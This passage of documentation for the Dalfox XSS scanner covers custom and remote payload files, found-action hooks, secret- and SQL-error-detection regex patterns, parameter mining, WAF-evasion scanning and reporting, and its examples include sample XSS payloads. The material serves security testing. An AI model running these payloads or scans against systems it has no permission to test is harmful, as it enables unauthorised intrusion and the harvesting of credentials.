dalfox url https://target-site.com --custom-payload exfiltration.txt
```

### DOM Exploration 

Custom payloads to explore DOM properties:

**dom-explore.txt:**
```
<img src=x onerror="alert(Object.keys(window))">
<script>alert(document.documentElement.innerHTML.substring(0,500))</script>
```

Combined with custom alert type:
```bash
dalfox url https://target-site.com --custom-payload dom-explore.txt --custom-alert-type none
```

## Best Practices

1. **Start Small**: Begin with a few custom payloads to test their effectiveness
2. **Test Variations**: Create multiple variations of the same payload to bypass different filters
3. **Use Context-Specific Payloads**: Create separate payload files for different contexts (HTML, JS, attribute, etc.)
4. **Document Your Payloads**: Add comments in your payload files to remember their purpose
5. **Combine with Other Features**: Use custom payloads with other Dalfox features like blind XSS for best results

---


## Found Action (advanced)

# Integration with found-action

The `--found-action` option in Dalfox allows you to specify actions to take when a vulnerability is detected. This can be useful for automating responses to findings, such as logging, alerting, or further processing.

## Using found-action

The `--found-action` option lets you define a command to execute when a vulnerability is found. The following placeholders can be used within the command:

| Placeholder  | Description                                                  |
| ------------ | ------------------------------------------------------------ |
| `@@query@@`  | The attack query (e.g., `https://www.hahwul.com?q="><script~~blahblah`) |
| `@@target@@` | The target site (e.g., `https://www.hahwul.com`)             |
| `@@type@@`   | The type of proof of concept (POC) (values: `WEAK` / `VULN`) |

### Example Command

```bash
dalfox url http://testphp.vulnweb.com/listproducts.php?cat=123&artist=123&asdf=ff --found-action "echo '@@query@@' > data"
```

### Example Output

```bash
cat data
http://testphp.vulnweb.com/listproducts.php?artist=123&asdf=ff&cat=123%27%3E%3Csvg%2Fclass%3D%27dalfox%27onLoad%3Dalert%2845%29%3E
```

## Modifying the Shell Application for found-action

The `--found-action-shell` flag allows you to change the shell application used for executing the found action. The default value is `bash`.

### Example Command with zsh

```bash
dalfox url http://testphp.vulnweb.com/listproducts.php?cat=123&artist=123&asdf=ff --found-action "echo '@@query@@' > data" --found-action-shell=zsh
```

### Example Command with sh (for Alpine Linux)

```bash
dalfox url http://testphp.vulnweb.com/listproducts.php?cat=123&artist=123&asdf=ff --found-action "echo '@@query@@' > data" --found-action-shell=sh
```

## Additional Resources

For more information and advanced usage, please refer to the [blog post on Dalfox's fun options](https://www.hahwul.com/2020/05/04/how-to-use-dalfoxs-fun-options/).

---


## Grepping (advanced)

# Grepping

Grepping is a passive scan with patterns during the XSS scanning flow. By default, grepping is enabled in Dalfox.

## Built-in Patterns

Dalfox includes a set of built-in patterns for grepping. Here are some examples:

```go
{
    "dalfox-ssti":                  "2958816",
    "dalfox-rsa-key":               "-----BEGIN RSA PRIVATE KEY-----|-----END RSA PRIVATE KEY-----",
    "dalfox-priv-key":              "-----BEGIN PRIVATE KEY-----|-----END PRIVATE KEY-----",
    "dalfox-aws-s3":                "s3\\.amazonaws.com[/]+|[a-zA-Z0-9_-]*\\.s3\\.amazonaws.com",
    "dalfox-aws-appsync-graphql":   "da2-[a-z0-9]{26}",
    "dalfox-slack-webhook1":        "https://hooks.slack.com/services/T[a-zA-Z0-9_]{8}/B[a-zA-Z0-9_]{8}/[a-zA-Z0-9_]{24}",
    "dalfox-slack-webhook2":        "https://hooks.slack.com/services/T[a-zA-Z0-9_]{8,10}/B[a-zA-Z0-9_]{8,10}/[a-zA-Z0-9_]{24}",
    "dalfox-slack-token":           "(xox[p|b|o|a]-[0-9]{12}-[0-9]{12}-[0-9]{12}-[a-z0-9]{32})",
    "dalfox-facebook-oauth":        "[f|F][a|A][c|C][e|E][b|B][o|O][o|O][k|K].{0,30}['\"\\s][0-9a-f]{32}['\"\\s]",
    "dalfox-twitter-oauth":         "[t|T][w|W][i|I][t|T][t|T][e|E][r|R].{0,30}['\"\\s][0-9a-zA-Z]{35,44}['\"\\s]",
    "dalfox-heroku-api":            "[h|H][e|E][r|R][o|O][k|K][u|U].{0,30}[0-9A-F]{8}-[0-9A-F]{4}-[0-9A-F]{4}-[0-9A-F]{4}-[0-9A-F]{12}",
    "dalfox-mailgun-api":           "key-[0-9a-zA-Z]{32}",
    "dalfox-mailchamp-api":         "[0-9a-f]{32}-us[0-9]{1,2}",
    "dalfox-picatic-api":           "sk_live_[0-9a-z]{32}",
    "dalfox-google-oauth-id":       "[0-9(+-[0-9A-Za-z_]{32}.apps.qooqleusercontent.com",
    "dalfox-google-api":            "AIza[0-9A-Za-z-_]{35}",
    "dalfox-google-oauth":          "ya29\\.[0-9A-Za-z\\-_]+",
    "dalfox-aws-access-key":        "AKIA[0-9A-Z]{16}",
    "dalfox-amazon-mws-auth-token": "amzn\\.mws\\.[0-9a-f]{8}-[0-9a-f]{4}-[0-9a-f]{4}-[0-9a-f]{4}-[0-9a-f]{12}",
    "dalfox-facebook-access-token": "EAACEdEose0cBA[0-9A-Za-z]+",
    "dalfox-github-access-token":   "[a-zA-Z0-9_-]*:[a-zA-Z0-9_\\-]+@github\\.com*",
    "dalfox-github":                "[gG][iI][tT][hH][uU][bB].*['|\"][0-9a-zA-Z]{35,40}['|\"]",
    "dalfox-azure-storage":         "[a-zA-Z0-9_-]*\\.file.core.windows.net",
    "dalfox-telegram-bot-api-key":  "[0-9]+:AA[0-9A-Za-z\\-_]{33}",
    "dalfox-square-access-token":   "sq0atp-[0-9A-Za-z\\-_]{22}",
    "dalfox-square-oauth-secret":   "sq0csp-[0-9A-Za-z\\-_]{43}",
    "dalfox-twitter-access-token":  "[tT][wW][iI][tT][tT][eE][rR].*[1-9][0-9]+-[0-9a-zA-Z]{40}",
    "dalfox-twilio-api-key":        "SK[0-9a-fA-F]{32}",
    "dalfox-braintree-token":       "access_token\\$production\\$[0-9a-z]{16}\\$[0-9a-f]{32}",
    "dalfox-stripe-api-key":        "sk_live_[0-9a-zA-Z]{24}",
    "dalfox-stripe-restricted-key": "rk_live_[0-9a-zA-Z]{24}",
    "dalfox-error-mysql":           "(SQL syntax.*MySQL|Warning.*mysql_.*|MySqlException \\(0x|valid MySQL result|check the manual that corresponds to your (MySQL|MariaDB) server version|MySqlClient\\.|com\\.mysql\\.jdbc\\.exceptions)",
    "dalfox-error-postgresql":      "(PostgreSQL.*ERROR|Warning.*\\Wpg_.*|valid PostgreSQL result|Npgsql\\.|PG::SyntaxError:|org\\.postgresql\\.util\\.PSQLException|ERROR:\\s\\ssyntax error at or near)",
    "dalfox-error-mssql":           "(Driver.* SQL[\\-\\_\\ ]*Server|OLE DB.* SQL Server|\bSQL Server.*Driver|Warning.*mssql_.*|\bSQL Server.*[0-9a-fA-F]{8}|[\\s\\S]Exception.*\\WSystem\\.Data\\.SqlClient\\.|[\\s\\S]Exception.*\\WRoadhouse\\.Cms\\.|Microsoft SQL Native Client.*[0-9a-fA-F]{8})",
    "dalfox-error-msaccess":        "(Microsoft Access (\\d+ )?Driver|JET Database Engine|Access Database Engine|ODBC Microsoft Access)",
    "dalfox-error-oracle":          "(\\bORA-\\d{5}|Oracle error|Oracle.*Driver|Warning.*\\Woci_.*|Warning.*\\Wora_.*)",
    "dalfox-error-ibmdb2":          "(CLI Driver.*DB2|DB2 SQL error|\\bdb2_\\w+\\(|SQLSTATE.+SQLCODE)",
    "dalfox-error-informix":        "(Exception.*Informix)",
    "dalfox-error-firebird":        "(Dynamic SQL Error|Warning.*ibase_.*)",
    "dalfox-error-sqlite":          "(SQLite\\/JDBCDriver|SQLite.Exception|System.Data.SQLite.SQLiteException|Warning.*sqlite_.*|Warning.*SQLite3::|\\[SQLITE_ERROR\\])",
    "dalfox-error-sapdb":           "(SQL error.*POS([0-9]+).*|Warning.*maxdb.*)",
    "dalfox-error-sybase":          "(Warning.*sybase.*|Sybase message|Sybase.*Server message.*|SybSQLException|com\\.sybase\\.jdbc)",
    "dalfox-error-ingress":         "(Warning.*ingres_|Ingres SQLSTATE|Ingres\\W.*Driver)",
    "dalfox-error-frontbase":       "(Exception (condition )?\\d+. Transaction rollback.)",
    "dalfox-error-hsqldb":          "(org\\.hsqldb\\.jdbc|Unexpected end of command in statement \\[|Unexpected token.*in statement \\[)",

    // SQL Injection patterns
    "dalfox-error-mysql1":  "SQL syntax.*?MySQL",
    "dalfox-error-mysql2":  "Warning.*?mysqli?",
    "dalfox-error-mysql3":  "MySQLSyntaxErrorException",
    "dalfox-error-mysql4":  "valid MySQL result",
    "dalfox-error-mysql5":  "check the manual that (corresponds to|fits) your MySQL server version",
    "dalfox-error-mysql6":  "check the manual that (corresponds to|fits) your MariaDB server version",
    "dalfox-error-mysql7":  "check the manual that (corresponds to|fits) your Drizzle server version",
    "dalfox-error-mysql8":  "Unknown column '[^ ]+' in 'field list'",
    "dalfox-error-mysql9":  "com\\.mysql\\.jdbc",
    "dalfox-error-mysql10": "Zend_Db_(Adapter|Statement)_Mysqli_Exception",
    "dalfox-error-mysql11": "MySqlException",
    "dalfox-error-mysql12": "Syntax error or access violation",

    // PostgreSQL patterns
    "dalfox-error-psql1":  "PostgreSQL.*?ERROR",
    "dalfox-error-psql2":  "Warning.*?\\Wpg_",
    "dalfox-error-psql3":  "valid PostgreSQL result",
    "dalfox-error-psql4":  "Npgsql\\.",
    "dalfox-error-psql5":  "PG::SyntaxError:",
    "dalfox-error-psql6":  "org\\.postgresql\\.util\\.PSQLException",
    "dalfox-error-psql7":  "ERROR:\\s\\ssyntax error at or near",
    "dalfox-error-psql8":  "ERROR: parser: parse error at or near",
    "dalfox-error-psql9":  "PostgreSQL query failed",
    "dalfox-error-psql10": "org\\.postgresql\\.jdbc",
    "dalfox-error-psql11": "PSQLException",

    // MSSQL patterns
    "dalfox-error-mssql1":  "Driver.*? SQL[\\-\\_\\ ]*Server",
    "dalfox-error-mssql2":  "OLE DB.*? SQL Server",
    "dalfox-error-mssql3":  "\bSQL Server[^&lt;&quot;]+Driver",
    "dalfox-error-mssql4":  "Warning.*?\\W(mssql|sqlsrv)_",
    "dalfox-error-mssql5":  "\bSQL Server[^&lt;&quot;]+[0-9a-fA-F]{8}",
    "dalfox-error-mssql6":  "System\\.Data\\.SqlClient\\.SqlException",
    "dalfox-error-mssql7":  "(?s)Exception.*?\bRoadhouse\\.Cms\\.",
    "dalfox-error-mssql8":  "Microsoft SQL Native Client error '[0-9a-fA-F]{8}",
    "dalfox-error-mssql9":  "\\[SQL Server\\]",
    "dalfox-error-mssql10": "ODBC SQL Server Driver",
    "dalfox-error-mssql11": "ODBC Driver \\d+ for SQL Server",
    "dalfox-error-mssql12": "SQLServer JDBC Driver",
    "dalfox-error-mssql13": "com\\.jnetdirect\\.jsql",
    "dalfox-error-mssql14": "macromedia\\.jdbc\\.sqlserver",
    "dalfox-error-mssql15": "Zend_Db_(Adapter|Statement)_Sqlsrv_Exception",
    "dalfox-error-mssql16": "com\\.microsoft\\.sqlserver\\.jdbc",
    "dalfox-error-mssql18": "SQL(Srv|Server)Exception"
}
```

## Disabling Built-in Grepping

If you do not want to use the built-in grepping patterns, you can disable them using the `--skip-grepping` option.

### Command

```bash
dalfox url https://google.com --skip-grepping
```

## Output Format

Here is an example of the output you can expect when grepping is enabled:

```
[*] 🦊 Start scan [SID:Single] / URL: http://testphp.vulnweb.com/listproducts.php
[G] Found dalfox-error-mysql via built-in grepping / original request
    Warning: mysql_fetch_array() expects parameter 1 to be resource, null given in /hj/var/www/listproducts.php on line 74
[POC][G][BUILT-IN/dalfox-error-mysql/GET] http://testphp.vulnweb.com/listproducts.php
```

## Using Custom Grepping

If you want to use custom grepping patterns, you can specify a custom file using the `--grep` option.

### Command

```bash
dalfox url https://google.com --grep grep_pattern.json
```

### Example Output

```
[G] Found via custom grepping / payload: 'adf , grep: internal_domain://asdf
    1 line:  internal_domain://asdf~~({"isSuccess":false,"errorMsg":"Parameter error! apps is null","error
    +> https://blahblha!~~~
```

### Sample Custom Grepping File

You can find a sample custom grepping file [here](https://github.com/hahwul/dalfox/blob/main/samples/sample_grep.json).

---


## Parameter Mining (advanced)

# Parameter Mining

## What is Parameter Mining?

Parameter mining is an advanced feature in Dalfox that automatically discovers potential injection points in web applications. Instead of only testing parameters that are visible in the URL, parameter mining helps identify hidden, undocumented, or forgotten parameters that might be vulnerable to XSS attacks.

Effective parameter discovery is crucial for thorough security testing because:

- Many vulnerabilities exist in parameters that aren't immediately visible
- Developers may inadvertently leave testing parameters in production
- Legacy parameters might remain functional but undocumented
- Frontend code might reveal parameters used by APIs and background processes

Dalfox implements two complementary parameter mining techniques:

1. **Dictionary-based Mining**: Tests common parameter names from wordlists
2. **DOM-based Mining**: Analyzes JavaScript code to extract parameter names

Both techniques are enabled by default to maximize discovery potential.

## Dictionary-based Parameter Mining

This technique involves testing a curated list of common parameter names against the target application.

### Default Wordlist

By default, Dalfox uses parameter lists from [Gf-Patterns](https://github.com/1ndianl33t/Gf-Patterns), specifically optimized for XSS vulnerability discovery. These lists include common parameter names like:

- `q`, `search`, `query` (search functionality)
- `redirect`, `url`, `next` (redirection)
- `id`, `user`, `page` (content identifiers)
- Many other parameters commonly associated with XSS vulnerabilities

### Using Custom Wordlists

For more targeted testing, you can provide your own parameter wordlist:

```bash
dalfox url https://example.com --mining-dict-word=./my-params.txt
```

Your custom wordlist should contain one parameter name per line:

```
search
q
query
keyword
id
page
user
name
redirect_to
callback
...
```

### Using Remote Wordlists

Dalfox can also retrieve and use wordlists from well-known security resources:

```bash
# Use one remote wordlist
dalfox url https://example.com --remote-wordlists=burp

# Use multiple remote wordlists
dalfox url https://example.com --remote-wordlists=burp,assetnote
```

Available remote wordlists:

| Source | Description | Parameter Count |
|--------|-------------|----------------|
| `burp` | Parameters from Burp Suite's Param Miner | ~6,000 parameters |
| `assetnote` | Assetnote's comprehensive parameter collection | ~15,000 parameters |

### Parameter Testing Methodology

When mining parameters, Dalfox:

1. Takes each parameter from the wordlist
2. Appends it to the target URL with a special marker value
3. Analyzes the response for reflections or changes in behavior
4. Flags potential injection points for further testing

For example, if the target is `https://example.com`, Dalfox might test:
```
https://example.com?search=DalfoxParameterCheck
https://example.com?q=DalfoxParameterCheck
https://example.com?id=DalfoxParameterCheck
...
```

## DOM-based Parameter Mining

DOM-based mining is a more sophisticated approach that analyzes JavaScript code to find parameters used by the application.

### How DOM Mining Works

Dalfox performs the following steps:

1. Downloads and parses all JavaScript files linked from the target page
2. Analyzes JavaScript code for parameter access patterns and URL manipulations
3. Extracts parameter names from functions like `URLSearchParams`, `getElementById`, event handlers, etc.
4. Tests discovered parameters for XSS vulnerabilities

This technique is especially effective for modern single-page applications (SPAs) and JavaScript-heavy websites.

### Example JavaScript Patterns Detected

```javascript
// URL parameter retrieval
const urlParams = new URLSearchParams(window.location.search);
const paramValue = urlParams.get('myParameter');

// DOM element access with parameter IDs
document.getElementById('search-input').value;

// Direct location search parsing
var query = location.search.split('query=')[1].split('&')[0];

// Event handlers for form elements
searchForm.addEventListener('submit', function(e) {
  // Form parameter handling
});
```

## Controlling Parameter Mining

### Fine-tuning Mining Behavior

Dalfox provides several options to control the parameter mining process:

```bash
# Disable only DOM-based mining
dalfox url https://example.com --skip-mining-dom

# Disable only dictionary-based mining
dalfox url https://example.com --skip-mining-dict

# Disable all parameter mining
dalfox url https://example.com --skip-mining-all
```

### When to Disable Mining

Consider disabling parameter mining in these scenarios:

- When you only want to test specific known parameters (`-p` flag)
- For very large applications where mining might take too long
- When testing API endpoints with a strict parameter structure
- During focused testing of already identified vulnerabilities

## Advanced Mining Techniques

### Combined Approach

For most effective parameter discovery, combine multiple techniques:

```bash
dalfox url https://example.com --remote-wordlists=burp,assetnote --mining-dict-word=./custom-params.txt
```

### Mining with Specified Parameters

You can combine parameter mining with specific parameter testing:

```bash
dalfox url https://example.com -p knownparam1 -p knownparam2
```

Dalfox will test both the specified parameters and any discovered through mining.

### Mining in Different Contexts

Parameter mining works across different scan modes:

```bash
# URL mode with mining
dalfox url https://example.com

# File mode with mining (multiple URLs)
dalfox file urls.txt

# Pipe mode with mining
cat urls.txt | dalfox pipe
```

## Practical Examples

### Basic Parameter Discovery

```bash
# Discover and test parameters on a target website
dalfox url https://example.com
```

Output example:
```
[*] Using dictionary mining option [list=GF-Patterns] 📚⛏
[*] Using DOM mining option 📦⛏
[I] Found testing point in DOM: searchQuery
[I] Found testing point in DOM: redirectUrl
[I] Found testing point by dictionary mining: q
[I] Found reflected parameter: searchQuery
```

### Advanced Discovery with Custom Parameters

```bash
# Combine known parameters with mining
dalfox url https://example.com -p admin -p token --remote-wordlists=burp
```

### Mining with Output Filtering

```bash
# Only show discovered parameters, skip testing
dalfox url https://example.com --only-discovery
```

## Best Practices

1. **Start Broad, Then Focus**: Begin with default mining, then focus on promising parameters
2. **Combine Approaches**: Use both dictionary and DOM-based mining for best results
3. **Custom Wordlists**: Create industry-specific wordlists for specialized applications
4. **Manage Resource Usage**: For large applications, consider testing in batches
5. **Verify Manually**: Some parameters might need manual verification

## Troubleshooting

### Common Issues

- **Too Many Parameters**: If mining discovers too many parameters, focus on those that show reflection
- **Slow Mining**: For large sites, try using smaller wordlists or increasing workers (`-w` flag)
- **False Positives**: Some parameters might be detected but not actually processed by the application

### Optimizing Mining Performance

```bash
# Faster mining with more workers
dalfox url https://example.com -w 200

# Use only the most common parameters
dalfox url https://example.com --mining-dict-word=./common-top100.txt
```

---


## Remote Payloads (advanced)

# Remote Payloads

## Overview

The Remote Payloads feature allows Dalfox to dynamically fetch and use XSS payloads from well-maintained external sources. This capability significantly expands Dalfox's testing coverage by incorporating hundreds of specialized payloads developed by security researchers.

Benefits of using remote payloads include:

- **Expanded Coverage**: Access to a wider variety of XSS vectors
- **Up-to-Date Techniques**: Leverage the latest XSS bypass techniques
- **Specialized Payloads**: Test against context-specific vulnerabilities
- **Reduced Maintenance**: No need to maintain your own comprehensive payload list
- **Community Knowledge**: Benefit from the collective expertise of security researchers

## Using Remote Payloads

### Basic Usage

To use payloads from a single remote source:

```bash
dalfox url https://example.com --remote-payloads portswigger
```

### Using Multiple Sources

Combine multiple remote payload sources for maximum coverage:

```bash
dalfox url https://example.com --remote-payloads portswigger,payloadbox
```

### Combining with Custom Payloads

Remote payloads can be used alongside your custom payloads for a comprehensive approach:

```bash
dalfox url https://example.com --remote-payloads portswigger --custom-payload my-payloads.txt
```

## Supported Remote Sources

Dalfox currently supports the following remote payload sources:

### PortSwigger XSS Cheat Sheet

```bash
dalfox url https://example.com --remote-payloads portswigger
```

- **Source**: [PortSwigger XSS Cheat Sheet](https://portswigger.net/web-security/cross-site-scripting/cheat-sheet)
- **Maintainer**: PortSwigger (creators of Burp Suite)
- **Payload Count**: ~100 specialized payloads
- **Features**: 
  - Browser-specific payloads
  - Event handler payloads
  - HTML5 vectors
  - Innovative encoding techniques
  - Filter bypass strategies

### PayloadBox XSS Payload List

```bash
dalfox url https://example.com --remote-payloads payloadbox
```

- **Source**: [PayloadBox XSS Payload List](https://github.com/payloadbox/xss-payload-list)
- **Maintainer**: PayloadBox Project
- **Payload Count**: ~200 payloads
- **Features**:
  - Basic to advanced vectors
  - Filter evasion techniques
  - Context-specific payloads
  - Polyglot payloads
  - DOM XSS specific payloads

## How Remote Payloads Work

When you use the `--remote-payloads` option, Dalfox:

1. Connects to the specified source(s) and downloads the latest payload collections
2. Parses and processes the payloads to ensure compatibility
3. Integrates them with the built-in payload database
4. Uses these payloads during the scanning process alongside Dalfox's native ones

The download process occurs once per scan, and the payloads are kept in memory for the duration of the scan.

![Remote Payloads Illustration](https://user-images.githubusercontent.com/13212227/120077625-49512d80-c0e6-11eb-9854-96c35259f276.jpg)

## Advanced Usage Scenarios

### WAF Bypass Testing

When testing against sites with Web Application Firewalls (WAFs), leverage the specialized bypass payloads:

```bash
dalfox url https://waf-protected-site.com --remote-payloads portswigger --waf-evasion
```

### High-Coverage Scanning

For maximum vulnerability detection in critical applications:

```bash
dalfox url https://critical-app.com --remote-payloads portswigger,payloadbox --deep-domxss --custom-payload ./specialized-payloads.txt
```

### Browser-Specific Testing

When testing for XSS in specific browsers:

```bash
# Testing with diverse payloads that might work in various browsers
dalfox url https://example.com --remote-payloads portswigger,payloadbox
```

## Best Practices

1. **Start with Built-In Payloads**: For quick scans, Dalfox's default payloads are often sufficient
2. **Use Remote Payloads for Thorough Testing**: Add remote payloads for comprehensive security assessments
3. **Combine Sources**: Different sources have different strengths; using multiple sources provides better coverage
4. **Consider Performance**: Using all remote sources increases scan time; for quick scans, choose one source
5. **Update Frequently**: Remote sources are periodically updated; run new scans to benefit from the latest payloads

## Troubleshooting

### Connection Issues

If Dalfox can't connect to remote sources:

- Verify your internet connection
- Check if the remote source is accessible
- Consider using a proxy if necessary:
  ```bash
  dalfox url https://example.com --remote-payloads portswigger --proxy http://your-proxy:8080
  ```

### Performance Considerations

If scanning with remote payloads is too slow:

- Use a single remote source instead of multiple
- Increase the worker count for faster processing:
  ```bash
  dalfox url https://example.com --remote-payloads portswigger -w 150
  ```
- Consider testing specific parameters only:
  ```bash
  dalfox url https://example.com --remote-payloads portswigger -p search -p q
  ```

## Future Payload Sources

The Dalfox team is continuously working to integrate additional remote payload sources. Future versions may include:

- Additional community-maintained XSS repositories
- Context-specific payload collections
- Framework-specific bypass techniques

For requests to add new remote payload sources, please open an issue on the [Dalfox GitHub repository](https://github.com/hahwul/dalfox/issues).

---


## Report (advanced)

# Comprehensive Reporting
{: .d-inline-block }

Since (v2.8.0) 
{: .label .label-green }

## Overview

Dalfox's reporting feature allows you to generate detailed reports of your XSS scans, providing comprehensive information about vulnerabilities, scanning parameters, and results. These reports are invaluable for:

- Documenting security assessments
- Sharing findings with development teams
- Creating audit trails for compliance requirements
- Building knowledge bases of common vulnerabilities
- Integrating with other security tools and dashboards

## Generating Reports

### Basic Report Generation

To generate a detailed report with your scan, use the `--report` flag:

```shell
dalfox url https://example.com/search?q=test --report
```

This command will execute the scan and produce a comprehensive report in plain text format, which includes detailed information about the scan configuration, discovered parameters, and any vulnerabilities found.

![Plain Text Report](https://user-images.githubusercontent.com/13212227/190555379-a4b06b07-0ae0-4f9a-859a-650ac34186ae.png)

### JSON Report Format

For integrating with other tools or for programmatic processing of results, you can generate reports in JSON format:

```shell
dalfox url https://example.com/search?q=test --report --report-format json
```

JSON reports are particularly useful for:
- Importing results into security dashboards
- Processing with scripts or other automation tools
- Creating custom visualizations of vulnerability data
- Storing structured data in security databases

![JSON Report](https://user-images.githubusercontent.com/13212227/190555382-cb7e37b9-b4c9-4c99-b853-ff65a1df9e01.png)

## Report Contents

A comprehensive Dalfox report includes:

### 1. Scan Configuration

- Target URL or files
- Scan mode and options used
- Date and time of the scan
- Dalfox version information

### 2. Parameter Analysis

- Discovered parameters (reflected, stored, DOM)
- Parameter sources (URL, body, headers, etc.)
- Parameter reflection contexts

### 3. Vulnerabilities Found

- XSS vulnerabilities (reflected, DOM-based, stored)
- Other vulnerabilities detected through BAV
- Vulnerability verification status
- Proof of concept URLs and payloads

### 4. Technical Details

- HTTP response codes
- Content types
- Reflection points
- DOM element details for verified vulnerabilities

## Saving Reports

### Saving to a File

To save the report to a file, combine the `--report` flag with the `-o` (output) flag:

```shell
dalfox url https://example.com/search?q=test --report --report-format json -o scan_results.json
```

For plain text reports:

```shell
dalfox url https://example.com/search?q=test --report -o scan_results.txt
```

### Including Raw HTTP Data

For even more detailed reports, you can include the raw HTTP requests and responses:

```shell
dalfox url https://example.com/search?q=test --report --output-request --output-response -o full_report.txt
```

## Using Reports Effectively

### For Security Teams

1. **Prioritizing Vulnerabilities**: Use the verification status to focus on confirmed XSS issues first
2. **Documentation**: Include reports in security assessment documentation
3. **Tracking Progress**: Compare reports over time to track vulnerability remediation

### For Developers

1. **Understanding Context**: The parameter analysis helps developers understand where vulnerabilities exist
2. **Remediation Guidance**: PoC payloads show exactly how vulnerabilities can be exploited
3. **Validation Testing**: Developers can use the same payloads to verify their fixes

### For Integration with Development Pipelines

1. **JSON Format**: Use JSON reports for integration with CI/CD pipelines
2. **Automated Triage**: Process reports to automatically create tickets for confirmed vulnerabilities
3. **Historical Analysis**: Store reports to track security progress over time

## Report Examples

### Plain Text Report Example

```
[Report] Dalfox v2.9.1 | Parameter Analysis and XSS Scanner Report
[Time] 2023-01-15 14:22:18
[Target] https://example.com/search?q=test

[Scan Summary]
- Worker: 100
- Scan Mode: url
- Parameters: 1 discovered
- BAV Enabled: true
- DOM Mining: enabled
- Dict Mining: enabled
- Scan Duration: 23.4 seconds

[Parameter Analysis]
- q: Reflected in HTML context, URL parameter
  - Reflection Count: 3
  - Reflection Points: body, title, meta

[Vulnerabilities]
1. Reflected XSS in 'q' parameter
   - Verified: Yes (Headless Browser)
   - Payload: <script>alert(1)</script>
   - PoC: https://example.com/search?q=%3Cscript%3Ealert%281%29%3C%2Fscript%3E
   - Context: HTML body

2. SQL Injection Pattern Detected
   - Verified: No (Pattern Match)
   - Parameter: q
   - Error: MySQL syntax error
   - PoC: https://example.com/search?q=test%27
```

### JSON Report Structure

```json
{
  "metadata": {
    "version": "2.9.1",
    "timestamp": "2023-01-15T14:22:18Z",
    "target": "https://example.com/search?q=test",
    "scanDuration": 23.4
  },
  "configuration": {
    "workers": 100,
    "mode": "url",
    "bavEnabled": true,
    "domMining": true,
    "dictMining": true
  },
  "parameters": [
    {
      "name": "q",
      "type": "url",
      "reflectionCount": 3,
      "reflectionPoints": ["body", "title", "meta"],
      "context": "html"
    }
  ],
  "vulnerabilities": [
    {
      "type": "xss",
      "parameter": "q",
      "verified": true,
      "payload": "<script>alert(1)</script>",
      "poc": "https://example.com/search?q=%3Cscript%3Ealert%281%29%3C%2Fscript%3E",
      "context": "html_body"
    },
    {
      "type": "sql_injection",
      "parameter": "q",
      "verified": false,
      "pattern": "MySQL syntax error",
      "poc": "https://example.com/search?q=test%27"
    }
  ]
}
```

## Best Practices

1. **Always Generate Reports**: Use the `--report` flag for any significant security tests
2. **Use JSON for Automation**: Choose JSON format when integrating with other tools
3. **Save Reports**: Always save reports to files for future reference
4. **Include Details**: For thorough analysis, include raw requests and responses
5. **Version Control**: Store reports in version control alongside the code they relate to
6. **Combine with HAR Files**: Use together with `--har-file-path` for complete HTTP transaction records

## Troubleshooting

- **Large Reports**: For very large targets, reports may be substantial. Consider filtering with `--only-poc`
- **Format Issues**: If a JSON report seems malformed, check for Unicode characters that might affect parsing
- **Missing Information**: Ensure you're using the latest version of Dalfox for the most comprehensive reports

---


## Write HAR file (advanced)

# Write HAR file
{: .d-inline-block }

SINCE (v2.9.0) 
{: .label .label-green }

In Dalfox 2.9 and later, all requests can be logged in HAR format. This allows you to save the HTTP Archive (HAR) file for further analysis or interaction with other tools.

## Generating a HAR File

To generate a HAR file, use the `--har-file-path` flag to specify the file path where the HAR file will be saved. Here is an example command:

```bash
dalfox url http://testphp.vulnweb.com/listproducts.php?cat=2 \
    --no-spinner \
    --no-color \
    --output-all \
    --follow-redirects \
    --silence \
    --format json \
    --har-file-path dump.har
```

## Example HAR File

Here is an example of the content you can expect in the generated HAR file:

```json
[
  {
    "startedDateTime": "2023-02-13T14:32:31+11:00",
    "time": 413.50575,
    "request": {
      "method": "GET",
      "url": "http://testphp.vulnweb.com/listproducts.php?cat=2%27%22%3E%3Csvg%2Fclass%3Ddalfox+onload%3D%26%2397%26%23108%26%23101%26%23114%26%2300116%26%2340%26%2341%26%23x2f%26%23x2f",
      "httpVersion": "HTTP/1.1",
      "cookies": [],
      "headers": [
        {
          "name": "Accept",
          "value": "text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.9"
        },
        {
          "name": "User-Agent",
          "value": "Mozilla/5.0 (Macintosh; Intel Mac OS X 10.15; rv:75.0) Gecko/20100101 Firefox/75.0"
        }
      ],
      "queryString": [
        {
          "name": "cat",
          "value": "2'\"><svg/class=dalfox onload=&#97&#108&#101&#114&#00116&#40&#41&#x2f&#x2f"
        }
      ],
      "headersSize": -1,
      "bodySize": -1
    },
    "response": {
      "status": 200,
      "statusText": "200 OK",
      "httpVersion": "HTTP/1.1",
      "cookies": [],
      "headers": [
        {
          "name": "Server",
          "value": "nginx/1.19.0"
        },
        {
          "name": "Date",
          "value": "Mon, 13 Feb 2023 03:32:31 GMT"
        },
        {
          "name": "Content-Type",
          "value": "text/html; charset=UTF-8"
        },
        {
          "name": "X-Powered-By",
          "value": "PHP/5.6.40-38+ubuntu20.04.1+deb.sury.org+1"
        }
      ],
      "content": {
        "size": -1,
        "mimeType": "text/html; charset=UTF-8",
        "text": "<!DOCTYPE HTML PUBLIC \"-//W3C//DTD HTML 4.01 Transitional//EN\"\n\"http://www.w3.org/TR/html4/loose.dtd\">\n<html><!-- InstanceBegin template=\"/Templates/...snip...meone break into your website. You can use it to test other tools and your manual hacking skills as well. Tip: Look for potential SQL Injections, Cross-site Scripting (XSS), and Cross-site Request Forgery (CSRF), and more.</p>\n</div>\n</div>\n</body>\n<!-- InstanceEnd --></html>\n"
      },
      "redirectURL": "",
      "headersSize": -1,
      "bodySize": -1
    },
    "cache": null,
    "timings": {
      "blocked": 0.001791,
      "dns": 0.775084,
      "connect": 190.115667,
      "send": 0.016708,
      "wait": 222.568834,
      "receive": 0.80275,
      "ssl": -1
    },
    "_messageId": 322
  }
]
```

## Viewing the HAR File

You can load the generated HAR file into Chrome DevTools or other tools that support HAR format for detailed analysis.

![chrome screenshot](https://user-images.githubusercontent.com/369053/218365521-5df5ff3c-759e-4bb8-9205-a45ac25481ca.png)

## Additional Resources

For more information and advanced usage, please refer to the [pull request](https://github.com/hahwul/dalfox/pull/440) that introduced this feature.

---


## Resources (advanced)

# Resources

---


## Global Flags (advanced)

# Global Flags

```
-b, --blind string                Add your blind xss
                                    * Example: -b your-callback-url
    --config string               Using config from file
-C, --cookie string               Add custom cookie
    --cookie-from-raw string      Load cookie from burp raw http request
                                    * Example: --cookie-from-raw request.txt
    --custom-alert-type string    Change alert value type
